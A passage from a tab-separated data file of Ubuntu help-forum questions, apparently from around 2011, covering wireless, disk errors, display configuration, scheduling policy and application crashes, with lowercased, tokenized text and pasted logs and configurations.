max_tx_power=27 dbm allowed channel : mode=0 chan=9 freq=2452 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=10 freq=2457 mhz max_tx_power=27 dbm allowed channel : mode=0 chan=11 freq=2462 mhz max_tx_power=27 dbm ht40 : control channel : 2 secondary channel : 6 rate [ 0 ] rate=10 flags=0x2 rate [ 1 ] rate=20 flags=0x6 rate [ 2 ] rate=55 flags=0x6 rate [ 3 ] rate=110 flags=0x6 rate [ 4 ] rate=60 flags=0x0 rate [ 5 ] rate=90 flags=0x0 rate [ 6 ] rate=120 flags=0x0 rate [ 7 ] rate=180 flags=0x0 rate [ 8 ] rate=240 flags=0x0 rate [ 9 ] rate=360 flags=0x0 rate [ 10 ] rate=480 flags=0x0 rate [ 11 ] rate=540 flags=0x0 passive scanning not supported mode : ieee 802.11g channel : 2 frequency : 2417 mhz could not set channel for kernel driver wlan1 : unable to setup interface . my wireless card is listed as 02:00.0 network controller : atheros communications inc. ar5008 wireless network adapter ( rev 01 ) by lspci . am i doing it wrong and there 's a new way of doing it ? i 'm holding off upgrading to natty because of this . what changed between the versions that would cause this ? should i report it as a bug ? by the way , here 's the version of hostapd and my hostapd.conf apt-cache policy hostapd hostapd : installed : 1:0.6.10-2 candidate : 1:0.6.10-2 version table : *** 1:0.6.10-2 0 500 http : //mirrors.xmission.com/ubuntu/ maverick/universe amd64 packages 100 /var/lib/dpkg/status pastebin of hostapd.conf
51214	computer freezes up	i am using the latest ubuntu os and up-to-date chrome browser . occasionally when i am working at a 5 hour stretch , the computer will freeze up completely and i will have to close down manually and reboot . when this happens i lose the material i have been working on as i can not save it . and i often receive a notice at this time saying that my profile is not available or that i do not have a profile . i am an ubuntu user not a technician and do not know what to do about this problem .
51223	games installed from repos wo n't start	i 'm running natty ( upgraded from maverick ) with gnome 3 ( from the gnome 3 ppa , unity removed ) , and have recently found that some of my games from the repos no longer work . when i go to start them , i get the message : failed to launch [ app name ] . failed to execute child process [ app name ] ( no such file or directory ) . i 've so far found this on gweled and pyscrabble . other games ( mines , sudoku , mahjongg ) , as well as other applications have opened just fine . gweled used to open fine until recently . any ideas on how to fix this ?
51226	how to add kernel module parameters ?	how to add a kernel module parameter in ubuntu 11.04 ? can i use the /etc/module file ? if yes , how ?
51228	usa keyboard layout keeps getting added on login	i use the usa international keyboard layout . every time i log in , the usa layout gets added to my list of layouts , which causes the keyboard layout indicator to be displayed . how can i stop the usa layout from being added ? additional info : i 'm running natty . until recently , i had all four layout slots filled . recently i changed from scim to ibus . with this change , i no longer need multiple layouts since ibus better handles my needs . so , i do n't want both indicators ( ibus and keyboard layout ) showing up .
51232	dell xps l502 optimus ... stuck at black screen after installing bumblebee	i am facing a problem after installing bumblebee when i try to start ubuntu normally the device get stuck on a black screen can any one help me with the right configuration for the graphic card ... all i need is to run with full desktop effects currently even compizconfig effects arent working also what should i have in the blacklist or is it correct the way bumblebee does it running ubuntu natty 11.04 32 bit thanks
51234	how to make aplications installed in /opt appear in unity ?	libreoffice 3.4 was installed in /opt and a link to the executable was put in /usr/bin , but unity search ca n't find it . also , if i open libreoffice writer , for instance , and ask to keep its icon in launcher , it does n't work afterwards .
51235	notification icon always the same , even when liferea has new items	as you can see on this screenshot , the icon circled in red is always the same , whether liferea has zero new items ( left side ) , or has new items ( right side ) . why not have different icons depending on whether there are new items or not ? is it : intended ? something to configure ? a bug on my system only ? a bug for everybody ? edit : since it is a bug , i filled this bug report .
51237	how can i debug the unity launcher where it sometimes causes a system freeze ?	sometimes when i move the mouse to the unity launcher the system freezes ( sometimes i can move the mouse ) . i ca n't even ctrl+alt+f1 . how would i go about figuring out what the cause is and recover from it ? as a workaround i 've disabled unity hiding as per the description here : how can i configure unity 's launcher auto-hide behavior ?
51238	no android item under : eclipse > window > preferences	i have installed the android sdk , but it does not show in windows > preferences . i have re-installed both the sdk and eclipse but the same problem persists i am on ubuntu 10.4 and eclipse helios . any help would be appreciated
51241	disk errors on tty and syslog/dmesg	recently i have started to get a lot of these errors : jun 18 08:57:42 abacus kernel : [ 401.554292 ] ata5 : serror : { hostint 10b8b } jun 18 08:57:42 abacus kernel : [ 401.559346 ] sr 4:0:0:0 : cdb : test unit ready : 00 00 00 00 00 00 jun 18 08:57:42 abacus kernel : [ 401.560191 ] ata5.00 : cmd a0/00:00:00:00:00/00:00:00:00:00/a0 tag 0 jun 18 08:57:42 abacus kernel : [ 401.560231 ] res 51/20:03:00:00:00/00:00:00:00:00/a0 emask 0x40 ( internal error ) jun 18 08:57:42 abacus kernel : [ 401.575310 ] ata5.00 : status : { drdy err } jun 18 08:57:42 abacus kernel : [ 401.579801 ] ata5 : hard resetting link jun 18 08:57:42 abacus kernel : [ 401.929320 ] ata5 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) jun 18 08:57:42 abacus kernel : [ 401.941936 ] ata5.00 : configured for udma/100 jun 18 08:57:42 abacus kernel : [ 401.969426 ] ata5 : eh complete jun 18 08:57:54 abacus kernel : [ 413.527699 ] ata5.00 : exception emask 0x40 sact 0x0 serr 0x80800 action 0x6 jun 18 08:57:54 abacus kernel : [ 413.527779 ] ata5.00 : irq_stat 0x40000001 jun 18 08:57:54 abacus kernel : [ 413.527822 ] ata5 : serror : { hostint 10b8b } jun 18 08:57:54 abacus kernel : [ 413.527901 ] sr 4:0:0:0 : cdb : test unit ready : 00 00 00 00 00 00 jun 18 08:57:54 abacus kernel : [ 413.528103 ] ata5.00 : cmd a0/00:00:00:00:00/00:00:00:00:00/a0 tag 0 jun 18 08:57:54 abacus kernel : [ 413.528142 ] res 51/20:03:00:00:00/00:00:00:00:00/a0 emask 0x40 ( internal error ) jun 18 08:57:54 abacus kernel : [ 413.528184 ] ata5.00 : status : { drdy err } jun 18 08:57:54 abacus kernel : [ 413.528303 ] ata5 : hard resetting link jun 18 08:57:54 abacus kernel : [ 413.875894 ] ata5 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) jun 18 08:57:54 abacus kernel : [ 413.888267 ] ata5.00 : configured for udma/100 jun 18 08:57:54 abacus kernel : [ 413.916365 ] ata5 : eh complete jun 18 08:57:56 abacus kernel : [ 415.537834 ] ata5.00 : exception emask 0x40 sact 0x0 serr 0x80800 action 0x6 jun 18 08:57:56 abacus kernel : [ 415.545253 ] ata5.00 : irq_stat 0x40000001 jun 18 08:57:56 abacus kernel : [ 415.549788 ] ata5 : serror : { hostint 10b8b } jun 18 08:57:56 abacus kernel : [ 415.554840 ] sr 4:0:0:0 : cdb : test unit ready : 00 00 00 00 00 00 jun 18 08:57:56 abacus kernel : [ 415.555201 ] ata5.00 : cmd a0/00:00:00:00:00/00:00:00:00:00/a0 tag 0 jun 18 08:57:56 abacus kernel : [ 415.555242 ] res 51/20:03:00:00:00/00:00:00:00:00/a0 emask 0x40 ( internal error ) jun 18 08:57:56 abacus kernel : [ 415.570483 ] ata5.00 : status : { drdy err } jun 18 08:57:56 abacus kernel : [ 415.574695 ] ata5 : hard resetting link jun 18 08:57:56 abacus kernel : [ 415.924954 ] ata5 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) jun 18 08:57:56 abacus kernel : [ 415.936831 ] ata5.00 : configured for udma/100 jun 18 08:57:56 abacus kernel : [ 415.965001 ] ata5 : eh complete jun 18 08:58:02 abacus kernel : [ 421.529784 ] ata5.00 : exception emask 0x40 sact 0x0 serr 0x80800 action 0x6 jun 18 08:58:02 abacus kernel : [ 421.529904 ] ata5.00 : irq_stat 0x40000001 jun 18 08:58:02 abacus kernel : [ 421.530023 ] ata5 : serror : { hostint 10b8b } jun 18 08:58:02 abacus kernel : [ 421.530104 ] sr 4:0:0:0 : cdb : test unit ready : 00 00 00 00 00 00 jun 18 08:58:02 abacus kernel : [ 421.530425 ] ata5.00 : cmd a0/00:00:00:00:00/00:00:00:00:00/a0 tag 0 jun 18 08:58:02 abacus kernel : [ 421.530466 ] res 51/20:03:00:00:00/00:00:00:00:00/a0 emask 0x40 ( internal error ) jun 18 08:58:02 abacus kernel : [ 421.530583 ] ata5.00 : status : { drdy err } jun 18 08:58:02 abacus kernel : [ 421.530705 ] ata5 : hard resetting link jun 18 08:58:02 abacus kernel : [ 421.873218 ] ata5 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) jun 18 08:58:02 abacus kernel : [ 421.885040 ] ata5.00 : configured for udma/100 jun 18 08:58:02 abacus kernel : [ 421.913404 ] ata5 : eh complete are these critical error messages ? what would be the cause and remedy ? here is the smartctl data : smartctl 5.40 2010-07-12 r3124 [ x86_64-unknown-linux-gnu ] ( local build ) copyright ( c ) 2002-10 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === model family : seagate momentus 5400.6 series device model : st9640320as serial number : 5wx1w9pw firmware version : 0002hpm1 user capacity : 640,135,028,736 bytes device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : ata-8-acs revision 4 local time is : fri jul 1 08:08:47 2011 pkt smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed see vendor-specific attribute list for marginal attributes . general smart values : offline data collection status : ( 0x82 ) offline data collection activity was completed without error . auto offline data collection : enabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 0 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 161 ) minutes . sct capabilities : ( 0x103f ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 10 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 112 099 006 pre-fail always - 45873136 3 spin_up_time 0x0023 098 098 000 pre-fail always - 0 4 start_stop_count 0x0032 100 100 000 old_age always - 208 5 reallocated_sector_ct 0x0033 100 100 036 pre-fail always - 0 7 seek_error_rate 0x002f 076 060 030 pre-fail always - 4339126852 9 power_on_hours 0x0032 097 097 000 old_age always - 3132 10 spin_retry_count 0x0033 100 100 097 pre-fail always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 208 183 runtime_bad_block 0x0032 100 100 000 old_age always - 0 184 end-to-end_error 0x0033 100 100 097 pre-fail always - 0 187 reported_uncorrect 0x0032 100 100 000 old_age always - 0 188 command_timeout 0x0032 100 099 000 old_age always - 19 189 high_fly_writes 0x003a 100 100 000 old_age always - 0 190 airflow_temperature_cel 0x0022 059 044 045 old_age always in_the_past 41 ( 0 3 46 33 ) 191 g-sense_error_rate 0x0032 100 100 000 old_age always - 4 192 power-off_retract_count 0x0022 100 100 000 old_age always - 31 193 load_cycle_count 0x0032 100 100 000 old_age always - 1915 194 temperature_celsius 0x0022 041 056 000 old_age always - 41 ( 0 13 0 0 ) 195 hardware_ecc_recovered 0x003a 048 047 000 old_age always - 45873136 196 reallocated_event_count 0x0032 100 100 000 old_age always - 0 197 current_pending_sector 0x0032 100 100 000 old_age always - 0 198 offline_uncorrectable 0x0030 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 254 free_fall_sensor 0x0032 100 100 000 old_age always - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 short offline completed without error 00 % 3115 - # 2 extended offline aborted by host 90 % 2865 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay .
51242	why ubuntu 11.04 under 64b is not able to identify sunspots on serial port ?	i am running sunspot sdk under ubuntu 11.04,64bit.i have connected my sunspot basestation and after running ant info for my spot it is not possible to be identified . i am getting the following : ant info buildfile : /home/home/sunspot/sdk/build.xml -pre-init : -do-init : -post-init : -warn-jar-file : init : -override-warning-find-spots : -prepare-conditions-for-find-spots : -find-shared-basestation : -run-spotfinder : [ exec ] using hardware abstraction layer ( hal ) to probe sun spots ... -check-spotfinder-result : -decide-whether-to-run-spotselector : -run-spotselector : [ java ] please wait while connected sun spots are examined ... [ java ] no serial port available [ java ] java result : 255 -collect-spotselector-result : -clean-up-spotselector-output-file : -spotselector-fail : build failed /home/home/sunspot/sdk/ant/find-spots.xml:367 : spotselector failed or was cancelled total time : 11 seconds i have also installed rxtx from here http : //www.cloudhopper.com/opensource/rxtx/ for linux-64b and i am able to see the following after running cat dev/ttyacm0 and rebooting my spot : cat /dev/ttyacm0 ** vm stopped : exit code = 0 ** *el* : s sun spot bootloader ( red-090706 ) *el* : s sun spot bootloader ( red-090706 ) *el* : s sun spot bootloader ( red-090706 ) *el* : s sun spot bootloader ( red-090706 ) *el* : s sun spot bootloader ( red-090706 ) *el* : s sun spot bootloader ( red-090706 ) *el* : s sun spot bootloader ( red-090706 ) *el* : s sun spot bootloader ( red-090706 ) squawk vm starting ( red-090706 ) ... base station ready ... and to check my usb : dmesg | grep usb [ 0.729536 ] usbcore : registered new interface driver usbfs [ 0.729553 ] usbcore : registered new interface driver hub [ 0.729595 ] usbcore : registered new device driver usb [ 1.390046 ] usb 2-5 : new high speed usb device using ehci_hcd and address 2 [ 18.176287 ] input : cnf9011 as /devices/pci0000:00/0000:00:1d.7/usb2/2-5/2-5:1.0/input/input5 [ 18.178362 ] usbcore : registered new interface driver uvcvideo [ 150.120103 ] usb 4-1 : new full speed usb device using uhci_hcd and address 2 [ 150.394719 ] usbcore : registered new interface driver cdc_acm any idea ? it seems that serial is not found .
51245	kubuntu chromium not using the system icons	i 'm using kubuntu 11.04 with chromium 12.0.742.91 ( 87961 ) ubuntu 11.04 my annoyance is that the menus and dialogues use a strange icons set which i presume to be a default gnome one . how can i change this to something more similar to my kde icon set ?
51247	how to convert .odt document to .org file ?	are there any tools to convert an openoffice.org ( .odt ) document to a .org file ?
51253	is there any way possible to undo a join request to a team , on launchpad.net ?	is there any way possible to undo a join request to a team , on launchpad.net ? it happens that i request to join a team by mistake , i thought it was the team responsible for the job i wanted to contribute to , but found it 's not , and in fact i had no reply from team admin . in this case someone can just add me , by my former request , while i changed my mind !
51256	less css compiler install	i wanted to install less compiler to my computer but when i ran following command : sudo gem install less and make command stopped the following error : g++ -shared -o v8.so v8_locker.o v8_debug.o v8_date.o v8_object.o v8.o rr.o v8_context.o v8_value.o v8_script.o v8_v8.o v8_callbacks.o v8_handle.o v8_weakref.o v8_template.o v8_message.o v8_function.o v8_string.o v8_array.o v8_try_catch.o v8_external.o v8_exception.o -l/home/segi/.gem/ruby/1.9.1/gems/libv8-3.3.10.2/lib/libv8/build/v8 -l. -l/usr/lib -l. -wl , -bsymbolic-functions -rdynamic -wl , -export-dynamic -lruby-1.9.1 -lpthread -lpthread -lrt -ldl -lcrypt -lm -lc -lv8 /usr/bin/ld : can not find -lv8 collect2 : ld returned 1 exit status make : *** [ v8.so ] error 1 which package missing ? or what is the problem ? thanks the answer ! sudo apt-get install libv8-dev it was good package but now i received the following error : g++ -i . -i/usr/include/ruby-1.9.1/i486-linux -i/usr/include/ruby-1.9.1/ruby/backward -i/usr/include/ruby-1.9.1 -i . -d_file_offset_bits=64 -wall -g -rdynamic -fpic -fno-strict-aliasing -g -g -o2 -o2 -g -wall -wno-parentheses -fpic -fno-strict-aliasing -g -o v8_template.o -c v8_template.cpp in file included from v8_template.cpp:1 : rr.h:30 : error : ‘stacktrace’ is not a member of ‘v8’ rr.h:30 : error : ‘stacktrace’ is not a member of ‘v8’ rr.h:30 : error : template argument 1 is invalid rr.h:31 : error : ‘stackframe’ is not a member of ‘v8’ rr.h:31 : error : ‘stackframe’ is not a member of ‘v8’ rr.h:31 : error : template argument 1 is invalid v8_template.cpp : in function ‘value < unnamed > : :obj : :setnamedpropertyhandler ( value , value , value , value , value , value , value ) ’ : v8_template.cpp:254 : error : invalid conversion from ‘v8 : :handle < v8 : :integer > ( * ) ( v8 : :local < v8 : :string > , const v8 : :accessorinfo & ) ’ to ‘v8 : :handle < v8 : :boolean > ( * ) ( v8 : :local < v8 : :string > , const v8 : :accessorinfo & ) ’ v8_template.cpp:254 : error : initializing argument 3 of ‘void v8 : :objecttemplate : :setnamedpropertyhandler ( v8 : :handle < v8 : :value > ( * ) ( v8 : :local < v8 : :string > , const v8 : :accessorinfo & ) , v8 : :handle < v8 : :value > ( * ) ( v8 : :local < v8 : :string > , v8 : :local < v8 : :value > , const v8 : :accessorinfo & ) , v8 : :handle < v8 : :boolean > ( * ) ( v8 : :local < v8 : :string > , const v8 : :accessorinfo & ) , v8 : :handle < v8 : :boolean > ( * ) ( v8 : :local < v8 : :string > , const v8 : :accessorinfo & ) , v8 : :handle < v8 : :array > ( * ) ( const v8 : :accessorinfo & ) , v8 : :handle < v8 : :value > ) ’ v8_template.cpp : in function ‘value < unnamed > : :obj : :setindexedpropertyhandler ( value , value , value , value , value , value , value ) ’ : v8_template.cpp:271 : error : invalid conversion from ‘v8 : :handle < v8 : :integer > ( * ) ( uint32_t , const v8 : :accessorinfo & ) ’ to ‘v8 : :handle < v8 : :boolean > ( * ) ( uint32_t , const v8 : :accessorinfo & ) ’ v8_template.cpp:271 : error : initializing argument 3 of ‘void v8 : :objecttemplate : :setindexedpropertyhandler ( v8 : :handle < v8 : :value > ( * ) ( uint32_t , const v8 : :accessorinfo & ) , v8 : :handle < v8 : :value > ( * ) ( uint32_t , v8 : :local < v8 : :value > , const v8 : :accessorinfo & ) , v8 : :handle < v8 : :boolean > ( * ) ( uint32_t , const v8 : :accessorinfo & ) , v8 : :handle < v8 : :boolean > ( * ) ( uint32_t , const v8 : :accessorinfo & ) , v8 : :handle < v8 : :array > ( * ) ( const v8 : :accessorinfo & ) , v8 : :handle < v8 : :value > ) ’ make : *** [ v8_template.o ] error 1
51261	my netbook freezes everytime i turn on wlan on ubuntu	everytime i try to use wlan connection on my netbook ( asus eepc ) my natty freezes and i 'm forced to restart and use my ethernet connection ... how can i resolve this ? i 've an atheros board .
51264	keyboard freezes / stuck if a key pressed repeatedly	i use acer 4530 . this problem has happened long since ubuntu 10.10 and now that i use 11.04 dual booted with linux mint 10 . everytime i press one key repeatedly , like when i read a long article in a website/ebook or when i play games which required me to press arrow keys repeatedly , it would randomly freeze . that is , whatever i press on keyboard has no effect , and that also happens with touchpad . however , the usb mouse works just fine . i later found out that it 's not actually freeze but more like it 's like the key stuck . for example when i play tetris which i usually press w ( down ) button repeatedly , after some times it would freeze . and if i put the cursor in , say , browser 's address bar , it would type `` wwww ... .. '' infinitely . the only way i could fix it is by suspend the laptop , either by using mouse or by closing the lid . and instead of suspended , in that case the laptop would automatically wake up and everything will be fine . ( usually my laptop would wake up after suspended by pressing any key ) it has happened since the first time i use ubuntu , 10.10 , and it also happens in linux mint 10 , and until now in ubuntu 11.04 . it never happened when i use windows , though . anyone has ever encounter similar problem ? anyone know how to fix it permanently ? update i just recently installed windows 7 and windows 8 development preview and both have similar symptoms . so i declare that this problem is not os specific , probably hardware problem .
51265	where is /var/log/messages ?	just installed natty , and can not find /var/log/messages . also , /var/log/daemon.log is missing . what happened ? why are they no longer present ? and where i can find the same log information ?
51272	how do i repartition with gparted ?	i wanted to create more space for ubuntu on my hard disk in favor of my windows partition . i booted the livecd and resized the ntfs partition to 100 gb . then i wanted to resize my ubuntu ( ext4 ) partition to fill up the created unallocated space . a screenshot of my current disk . ( with the livecd there 's no 'key ' icon after sda6 ) my first thought was just right click on sda6 → move/resize → done . unfortunately i can not resize or move the partition . however i can resize the ntfs partition . i guess it is because the extended sda4 partition is locked . i could n't see an unlock possibility though… so how do i resize the ext4 partition anyway , probably by unlocking the extended partition , but how ? thanks in advance .
51278	switching dvi socket	i have ubuntu 10.10 x86_64 with nvidia 9800 gt and nvidia driver version 270.41.06 my video card has two dvi sockets , but i only use the single monitor configuration . now , i think the main dvi socket might be busted , so i want to try to enable the other as the main one , however , i do n't know how to achieve that . i tried just plugging the monitor in that socket but it wo n't auto-detect it ( it would have been way too easy to just work ) . this is my xorg.conf : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin identifier `` monitor0 '' vendorname `` unknown '' modelname `` aoc '' horizsync 31.5 - 84.7 vertrefresh 60.0 - 78.0 modeline `` 1080p '' 172.8 1920 2040 2248 2576 1080 1081 1084 1118 -hsync +vsync option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9800 gt '' endsection section `` screen '' # removed option `` metamodes '' `` 1024x768 +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` customedid '' `` crt-0 : /home/charlesq/lg.bin '' option `` tvstandard '' `` hd1080p '' option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` 1080p +0+0 '' subsection `` display '' depth 24 endsubsection endsection
51283	how to run a program with sched_rr policy from command line ?	by default programs run with time sharing ( ts policy ) on linux . how to run a program with sched_rr policy on linux from command line ? thanks for giving information about chrt ( 1 ) command . i have used the command to run firefox with rr policy , but as you see below , only main thread of firefox runs with rr policy . could you tell me how to run all other threads of firefox also with rr policy . $ ps -lo pid , tid , class 2051 pid tid cls 2051 2051 rr 2051 2055 ts 2051 2056 ts 2051 2057 ts 2051 2058 ts 2051 2059 ts 2051 2060 ts 2051 2061 ts 2051 2063 ts 2051 2067 ts 2051 2068 ts 2051 2069 ts 2051 2070 ts 2051 2072 ts 2051 2073 ts 2051 2074 ts 2051 2075 ts 2051 2077 ts 2051 2078 ts 2051 2080 ts 2051 2356 rr 2051 2386 ts 2051 2387 ts edit : i ran the following simple pthreads program and tested like the above . unfortunately chrt command only changes the class of the main thread . please see below . $ ps -lo pid , tid , class 3552 pid tid cls 3552 3552 ts 3552 3553 ts 3552 3554 ts 3552 3555 ts 3552 3556 ts 3552 3557 ts $ sudo chrt -- rr -p 30 3552 ... $ ps -lo pid , tid , class 3552 pid tid cls 3552 3552 rr 3552 3553 ts 3552 3554 ts 3552 3555 ts 3552 3556 ts 3552 3557 ts -- -- program -- -- # include < pthread.h > # include < stdio.h > # define num_threads 5 void *printhello ( void *threadid ) { long tid ; tid = ( long ) threadid ; printf ( `` hello world ! it 's me , thread # % ld ! \n '' , tid ) ; long k = 1 ; long a [ 10000 ] ; int i = 1 ; long b [ 10000 ] ; for ( k = 0 ; k < 400000000 ; k++ ) { if ( i == 9999 ) { i = 1 ; } a [ i ] = ( ( k + i ) * ( k - i ) ) /2 ; a [ i ] = k/2 ; b [ i ] = i * 20 ; b [ i ] = a [ i ] - b [ i ] ; i++ ; int j = 0 ; for ( j = 0 ; j < i ; j++ ) { k = j - i ; } } pthread_exit ( null ) ; } int main ( int argc , char *argv [ ] ) { pthread_t threads [ num_threads ] ; int rc ; long t ; for ( t=0 ; t < num_threads ; t++ ) { printf ( `` in main : creating thread % ld\n '' , t ) ; rc = pthread_create ( & threads [ t ] , null , printhello , ( void * ) t ) ; if ( rc ) { printf ( `` error ; return code from pthread_create ( ) is % d\n '' , rc ) ; exit ( -1 ) ; } } pthread_exit ( null ) ; }
51287	how to fix boundary for each of my monitors ?	this is related to why are notifications appearing in the invisible black zone above my monitor ? . is there a way i can fix the boundary of my monitors ( the way it is in windows ) , ie such that monitors do not allow stuff to go beyond their boundaries . as it is now , i can easily move stuff beyond the edge , and still see it in expo . if i move something to the top of a monitor , it should appear in the lower workspace , without any cuts , meaning there is no part of the window in a black screen . one possible choice is to align the top of the two monitors , but since my laptop is placed lower than my monitor , i do n't want to do that . i 'm using natty , ubuntu classic . see the white window dragging across the dark area . i think this has been happening since i played with the compiz-wallpaper plugin . but i 've disabled that since then , and this issue remains . update : i 'm using an intel gma_x4500 , default ubuntu drivers ( dell inspiron 1545 ) .
51289	presentation creation tools	other than libreoffice/openoffice.org impress what good presentation making tools are available for ubuntu ? i prefer a gui tool which can export to pdf as i have to make presentation in windows pc . can pdf support animations with adobe reader 8/9 ? i remember reading html presentations are often attractive but do n't know how to create one . are there nice tools for that purpose ? can such a presentation run with all effects on an older browser , say ie6/7 ?
51290	how can i integrate firefox with kde 's theme ?	when using firefox in kubuntu the difference between kde 's theme and firefox 's theme is huge . is there any way to make the theme in firefox look like the one in ubuntu all smooth , fonts with correct size , etc.. right now , firefox in kde makes everything like it was made 10 years ago with mspaint . the fonts are very small and it does not look good .
51294	kubuntu 11.04 bad experience , gimp crashes and other bugs	i installed kubuntu 11.04 64bit today . first let me expose some issues , this is not a rant , just some observations on kubuntu 11.04 : ) flash does n't work . the package `` flashplugin-installer '' was installed by rekonq . but still no flash . additional drivers ( jockey-kde ) does n't show up automatically after first login . i tried to delete a large file ( 19,2 gb ) , an error appeared : `` please empty the trash first , no more space available '' or something like that , but you know what ? my trash was empty ! ( then i found in dolphin the settings to increment the max size of the trash ) . amarok has no play/pause/forward/back buttons , only after changing settings to show those buttons on the top bar . gtk applications like ubuntu software center , inkscape ... are in english , but my default language is `` german '' . only gimp allows to install the `` de '' language pack . the numblock turns off after each restart . in the kde control center , the `` remember last state '' of numblock is set . but this is not working . i had some crashes : nepomuk , policy-kit , plasma-workspace and gimp . but now to the important stuff . i really need gimp to work . after starting it , i get a crash : giowck @ giowck-desktop : ~ $ gimp ( gimp:1899 ) : glib-warning ** : /build/buildd/glib2.0-2.28.6/./glib/goption.c:2132 : ignoring no-arg , optional-arg or filename flags ( 8 ) on option of type 0 speicherzugriffsfehler ( in english : `` memory error '' ) what can i do to run gimp ? thanks
51298	some flash moving portions displayed incorrectly in firefox	i am using 11.04 natty and firefox 5 . video card is ati radeon hd 4670 and i am using the newest proprietary driver downloaded from ati website . some flash apps , such as embedded youtube vids and a couple of other apps , are displayed incorrectly ( i think with real embed instead of the new iframe embed ) . what happens is as a portion of the flash moves around , parts of it keeps blanking out . for the embedded youtube vid , it greys out . some other apps turns transparent , showing the webpage 's background . the same flash apps runs perfectly fine for google chromium on the same computer . i have another computer with 10.10 maverick , firefox 5 and nvidia card and driver , and it they also run fine . so , anyone has an idea of what is causing the problem ?
51299	sync profile/data/software for multiple computers ?	is it possible to sync all the user settings ( interface settings , program settings ) , as well as programs for multiple computers ? data is not as important , though the settings ( which is technically data , but not that kind of data , like music , files ... ) and applications are . also , it will not sync the drivers . ( example : 1 computer uses bumblebee and the other uses ati catalyst , and maybe there 's different network drivers.. etc . )
51301	backlight ca n't be turn on in acer aspire 4736	when i booted up my newly installed ubuntu 11.04 , i discovered , to my dismay , that the backlight was off by default . the keyboard shortcut ( which is fn+f6 on my acer aspire 4736 ) for turning on the backlight does n't seem to work . i have been trying to resolve this problem for the past 2 days now , but with no success . by the way , the backlight did work properly once or twice at random - but the problem again popped up as soon as i restarted my system . thanks for your suggestion lekensteyn , but i tried it and it did n't work . could you , or anyone else suggest something else ? i have really become addicted to ubuntu , and working on windows seems unnatural to me now .
51302	are files synced from mobile app supposed to download to my pc 's ubuntu one folder ?	i just installed ubuntu one files for android and it uploaded all my pictures and i can see them in the web interface . can i get this folder to automatically download all the files to my ubuntu one folder on my ubuntu pc ?
51310	`` the daemon is being inhibited '' error message when mounting volumes on a partitioned external hd	i 'm having a great deal of difficulty with an external hard drive . i 'm currently running a dual boot system ( xp service pack 3 and ubuntu 11.04 natty narwahl ) on a dell inspiron b120 . i 'm trying to set up a new 80 gb hitachi external hd . using gparted , i formatted the drive and set up the partitions . the partitioning scheme is as follows 10gb ntfs primary , 2gb linux-swap primary , 50gb fat32 primary , 12gb unallocated . after applying those changes , i went into disk utility and the hd appears along with the correct partitions . when i try to mount the volumes for partitions 1 and 3 , i get a pop-up stating : error mounting volume an error occurred while performing an operation on `` home '' ( partition 3 of hts548080m9at00 ) : the daemon is being inhibited . when i try to to check the filesystem i get a pop-up stating : error checking filesystem on volume an error occurred while performing an operation on `` home '' ( partition 3 of hts548080m9at00 ) : the daemon is being inhibited . throughout the time that i 'm attempting to troubleshoot the problem , the external drive light is on and blinking . with my frustration hitting a boiling point , i try to shut down the drive and remove it so that i can plug in a different external hd that works perfectly . however , when i try to shut down and safely remove the drive , i get a pop-up stating : error detaching drive an error occurred while performing an operation on `` 80gb hard disk '' ( hts548080m9at00 ) : the daemon is being inhibited . can anyone tell me what i 'm doing wrong ? i 'm a newbie and not that skilled with terminal commands , so please dumb it down for me if you request specific command output .
51311	is there going to be twinview ( or alternative ) implemented for nouveau ?	as i 've had heavy issues with nvidia driver regarding performance of basic x window operations ( window moving , resizing , scrolling ) . i switched to nouveau driver . but i lost the possibility of having dual screen that i had previously thanks to nvidia twinview feature ... anyway i rather have fluent x than dual screen , but having dual screen would be nice , so i 'm wondering if there is already an nouveau alternative to nvidia 's twinview or if it is going to be implemented .
